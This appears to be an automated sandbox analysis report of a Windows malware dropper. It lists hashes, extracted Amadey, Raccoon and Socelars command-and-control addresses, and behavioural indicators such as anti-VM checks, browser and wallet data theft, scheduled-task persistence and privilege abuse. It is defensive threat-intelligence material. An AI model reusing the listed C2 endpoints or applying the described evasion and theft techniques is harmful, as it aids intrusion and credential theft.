Analysis
max time kernel: 151s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-01-2023 21:02
Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20221111-en
General
Target: file.exe
Size: 4.5MB
MD5: 45808a630c51b487ada4b470be9b5964
SHA1: 527185ffef9e41a671ee637a82df9e5a43a296ca
SHA256: ba36d04cdfbdd729450db17a6f0b8b953ca8b91aefb9d56a71e58864c8e0fb61
SHA512: 34b655f964e43f6267362b4e9b5915351b2c23d5ce81a21e3db1140fdf451248bead299d8e3bbd2d99d1972275f28a88d666f4a94a9e2d8ceb2ac7ae12d90559
SSDEEP: 98304:1IiEg/+jaTrBfR2CNgPAtBlycENpYp7O9xs:1o22CNgzcEPU7Ov
Malware Config
Extracted: amadey
- 3.65
- 77.73.134.27/8bmdh3Slb2/index.php
Extracted: raccoon
- 04f8fa0bf52b1b98a127f6deeac54f84
- http://94.131.3.70/
- http://83.217.11.11/
- http://83.217.11.13/
- http://83.217.11.14/
- http://45.15.156.222/
Extracted: socelars
- https://hdbywe.s3.us-west-2.amazonaws.com/sdfeas18/
Signatures
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4712 | 2652 | rundll32.exe | 96
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 732 | 2652 | rundll32.exe | 96
Socelars payload 2 IoCs
resource | yara_rule
- behavioral2/files/0x0001000000022e08-171.dat | family_socelars
- behavioral2/files/0x0001000000022e08-170.dat | family_socelars
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description | ioc | Process
- Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | birge.exe
- Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | W8xBG2CB.exe
- Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | WlndowsDraiver-Ver2.5.5.8.exe
Blocklisted process makes network request 1 IoCs
flow | pid | Process
- 164 | 4424 | rundll32.exe
Downloads MZ/PE file
Executes dropped EXE 20 IoCs
pid | Process
- 536 | Player3.exe
- 620 | birge.exe
- 1500 | nbveek.exe
- 2892 | zhangfan.exe
- 3592 | zhangfan.exe
- 396 | pb1111.exe
- 4848 | handdiy_1.exe
- 976 | random.exe
- 3192 | random.exe
- 1224 | setup.exe
- 5040 | Install.exe
- 3412 | Install.exe
- 1088 | W8xBG2CB.exe
- 4620 | nEzF0Hw6.exe
- 3988 | nbveek.exe
- 4852 | WlndowsDraiver-Ver2.5.5.8.exe
- 4748 | NbuyrFd.exe
- 376 | nbveek.exe
- 1088 | ChromeRecovery.exe
- 3868 | OMKHFdR.exe
resource | yara_rule
- behavioral2/files/0x0001000000022e05-161.dat | vmprotect
- behavioral2/files/0x0001000000022e05-160.dat | vmprotect
- behavioral2/memory/396-163-0x0000000140000000-0x000000014061E000-memory.dmp | vmprotect
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | birge.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | birge.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | W8xBG2CB.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | W8xBG2CB.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | WlndowsDraiver-Ver2.5.5.8.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | WlndowsDraiver-Ver2.5.5.8.exe
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
- Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | file.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | random.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | W8xBG2CB.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | birge.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | OMKHFdR.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | Player3.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | nbveek.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | zhangfan.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | Install.exe
Loads dropped DLL 8 IoCs
pid | Process
- 4824 | rundll32.exe
- 1228 | rundll32.exe
- 620 | birge.exe
- 620 | birge.exe
- 620 | birge.exe
- 4572 | rundll32.exe
- 4424 | rundll32.exe
- 4424 | rundll32.exe
Modifies file permissions 1 TTPs 3 IoCs
pid | Process
- 2012 | icacls.exe
- 620 | icacls.exe
- 828 | icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
resource | yara_rule
- behavioral2/files/0x0003000000022e6c-231.dat | themida
- behavioral2/files/0x0003000000022e6c-230.dat | themida
- behavioral2/memory/1088-232-0x0000000140000000-0x0000000141064000-memory.dmp | themida
- behavioral2/memory/1088-238-0x0000000140000000-0x0000000141064000-memory.dmp | themida
- behavioral2/files/0x0004000000022e3b-249.dat | themida
- behavioral2/memory/1088-250-0x0000000140000000-0x0000000141064000-memory.dmp | themida
- behavioral2/memory/4852-253-0x0000000140000000-0x0000000141064000-memory.dmp | themida
- behavioral2/memory/4852-254-0x0000000140000000-0x0000000141064000-memory.dmp | themida
- behavioral2/memory/4852-289-0x0000000140000000-0x0000000141064000-memory.dmp | themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
description | ioc | Process
- Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | WlndowsDraiver-Ver2.5.5.8.exe
- Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | birge.exe
- Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | W8xBG2CB.exe
Drops Chrome extension 1 IoCs
description | ioc | Process
- File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | OMKHFdR.exe
Drops desktop.ini file(s) 1 IoCs
description | ioc | Process
- File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | OMKHFdR.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Drops file in System32 directory 27 IoCs
description | ioc | Process
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | OMKHFdR.exe
- File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_2DC033A4A2D3E56E04293794AD2B5A7F | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_2DC033A4A2D3E56E04293794AD2B5A7F | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | OMKHFdR.exe
- File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_AC22B722B474AE2AEDB339EDE8A91804 | OMKHFdR.exe
- File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_AC22B722B474AE2AEDB339EDE8A91804 | OMKHFdR.exe
- File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
- File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | NbuyrFd.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | OMKHFdR.exe
- File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | NbuyrFd.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C | OMKHFdR.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | OMKHFdR.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid | Process
- 620 | birge.exe
Drops file in Program Files directory 31 IoCs
description | ioc | Process
- File created | C:\Program Files (x86)\zFCBYkQYpDUn\NjmKmYG.dll | OMKHFdR.exe
- File created | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\manifest.json | elevation_service.exe
- File created | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\_metadata\verified_contents.json | elevation_service.exe
- File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | OMKHFdR.exe
- File opened for modification | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\manifest.json | elevation_service.exe
- File created | C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js | handdiy_1.exe
- File created | C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\manifest.json | handdiy_1.exe
- File opened for modification | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\ChromeRecovery.exe | elevation_service.exe
- File created | C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR\vZGhkIX.xml | OMKHFdR.exe
- File created | C:\Program Files (x86)\nWqLCKNYOCKLC\OpkcIds.dll | OMKHFdR.exe
- File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | OMKHFdR.exe
- File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | OMKHFdR.exe
- File created | C:\Program Files (x86)\sDZzDwaoU\KvAeUNL.xml | OMKHFdR.exe
- File created | C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\jquery-3.3.1.min.js | handdiy_1.exe
- File created | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\ChromeRecoveryCRX.crx | elevation_service.exe
- File created | C:\Program Files (x86)\sDZzDwaoU\jGcLAk.dll | OMKHFdR.exe
- File opened for modification | C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js | handdiy_1.exe
- File created | C:\Program Files (x86)\nWqLCKNYOCKLC\tCCGmgb.xml | OMKHFdR.exe
- File created | C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\content.js | handdiy_1.exe
- File created | C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\pad-nopadding.js | handdiy_1.exe
- File created | C:\Program Files (x86)\EqfDIhLUOuAU2\kNeSGxe.xml | OMKHFdR.exe
- File created | C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\background.html | handdiy_1.exe
- File created | C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\icon.png | handdiy_1.exe
- File created | C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\aes.js | handdiy_1.exe
- File created | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\ChromeRecovery.exe | elevation_service.exe
- File opened for modification | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\_metadata\verified_contents.json | elevation_service.exe
- File created | C:\Program Files (x86)\EqfDIhLUOuAU2\ojoGlcSLaAKkD.dll | OMKHFdR.exe
- File created | C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR\xnAEgLU.dll | OMKHFdR.exe
- File created | C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\mode-ecb.js | handdiy_1.exe
- File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | OMKHFdR.exe
- File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | OMKHFdR.exe
Drops file in Windows directory 4 IoCs
description | ioc | Process
- File created | C:\Windows\Tasks\ckXwTgLLPEtUwbToA.job | schtasks.exe
- File created | C:\Windows\Tasks\FeYIZJMIrDMHpta.job | schtasks.exe
- File created | C:\Windows\Tasks\zCCIxqGdnvUEnSAiG.job | schtasks.exe
- File created | C:\Windows\Tasks\bnNSajhVxJSdGghoLZ.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 3 IoCs
pid | pid_target | Process | procid_target
- 824 | 4824 | WerFault.exe | 99
- 1728 | 1228 | WerFault.exe | 111
- 3732 | 4424 | WerFault.exe | 189
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
- 1432 | schtasks.exe
- 1312 | schtasks.exe
- 4452 | schtasks.exe
- 4544 | schtasks.exe
- 772 | schtasks.exe
- 2452 | schtasks.exe
- 4724 | schtasks.exe
- 1040 | schtasks.exe
- 3588 | schtasks.exe
- 5012 | schtasks.exe
- 2760 | schtasks.exe
- 4132 | schtasks.exe
- 4740 | schtasks.exe
- 3728 | schtasks.exe
Enumerates system info in registry 2 TTPs 10 IoCs
description | ioc | Process
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Kills process with taskkill 1 IoCs
pid | Process
- 764 | taskkill.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | OMKHFdR.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | rundll32.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | OMKHFdR.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | OMKHFdR.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\NukeOnDelete = "0" | OMKHFdR.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | OMKHFdR.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000} | OMKHFdR.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume | OMKHFdR.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\MaxCapacity = "15140" | OMKHFdR.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | OMKHFdR.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | OMKHFdR.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description | flow | ioc
- HTTP User-Agent header | 14 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header | 44 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process (repeated entries grouped; 64 entries in total)
- 620 | birge.exe (6 entries)
- 4404 | chrome.exe (2 entries)
- 5072 | chrome.exe (3 entries)
- 5012 | powershell.EXE (3 entries)
- 3600 | chrome.exe (2 entries)
- 620 | chrome.exe (2 entries)
- 4076 | chrome.exe (2 entries)
- 3744 | chrome.exe (2 entries)
- 1068 | powershell.exe (3 entries)
- 3128 | powershell.exe (3 entries)
- 4620 | powershell.EXE (3 entries)
- 4764 | chrome.exe (2 entries)
- 3868 | OMKHFdR.exe (31 entries)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid | Process (repeated entries grouped; 10 entries in total)
- 5072 | chrome.exe (5 entries)
- 2648 | chrome.exe (5 entries)
Suspicious use of AdjustPrivilegeToken 39 IoCs
description | pid | Process
- Token: SeCreateTokenPrivilege | 4848 | handdiy_1.exe
- Token: SeAssignPrimaryTokenPrivilege | 4848 | handdiy_1.exe
- Token: SeLockMemoryPrivilege | 4848 | handdiy_1.exe
- Token: SeIncreaseQuotaPrivilege | 4848 | handdiy_1.exe
- Token: SeMachineAccountPrivilege | 4848 | handdiy_1.exe
- Token: SeTcbPrivilege | 4848 | handdiy_1.exe
- Token: SeSecurityPrivilege | 4848 | handdiy_1.exe
- Token: SeTakeOwnershipPrivilege | 4848 | handdiy_1.exe
- Token: SeLoadDriverPrivilege | 4848 | handdiy_1.exe
- Token: SeSystemProfilePrivilege | 4848 | handdiy_1.exe
- Token: SeSystemtimePrivilege | 4848 | handdiy_1.exe
- Token: SeProfSingleProcessPrivilege | 4848 | handdiy_1.exe
- Token: SeIncBasePriorityPrivilege | 4848 | handdiy_1.exe
- Token: SeCreatePagefilePrivilege | 4848 | handdiy_1.exe
- Token: SeCreatePermanentPrivilege | 4848 | handdiy_1.exe
- Token: SeBackupPrivilege | 4848 | handdiy_1.exe
- Token: SeRestorePrivilege | 4848 | handdiy_1.exe
- Token: SeShutdownPrivilege | 4848 | handdiy_1.exe
- Token: SeDebugPrivilege | 4848 | handdiy_1.exe
- Token: SeAuditPrivilege | 4848 | handdiy_1.exe
- Token: SeSystemEnvironmentPrivilege | 4848 | handdiy_1.exe
- Token: SeChangeNotifyPrivilege | 4848 | handdiy_1.exe
- Token: SeRemoteShutdownPrivilege | 4848 | handdiy_1.exe
- Token: SeUndockPrivilege | 4848 | handdiy_1.exe
- Token: SeSyncAgentPrivilege | 4848 | handdiy_1.exe
- Token: SeEnableDelegationPrivilege | 4848 | handdiy_1.exe
- Token: SeManageVolumePrivilege | 4848 | handdiy_1.exe
- Token: SeImpersonatePrivilege | 4848 | handdiy_1.exe
- Token: SeCreateGlobalPrivilege | 4848 | handdiy_1.exe
- Token: 31 | 4848 | handdiy_1.exe
- Token: 32 | 4848 | handdiy_1.exe
